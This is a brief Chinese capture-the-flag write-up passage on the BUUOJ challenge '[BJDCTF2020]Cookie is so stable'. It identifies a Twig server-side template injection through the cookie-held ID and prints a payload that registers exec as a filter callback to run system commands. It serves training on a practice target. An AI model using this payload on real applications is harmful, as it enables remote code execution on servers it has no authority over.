https://buuoj.cn/challenges#[BJDCTF2020]Cookie%20is%20so%20stable
题目名称和hint都提示注意Cookie
在flag.php
页面中提交一个ID
后回显在页面上,猜测是PHP
的模板注入
试了几种标签测试方法,发现只有Twig
的标签测试能成功执行,那就应该是Twig
的模板了
网上找Twig
模板注入的Payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}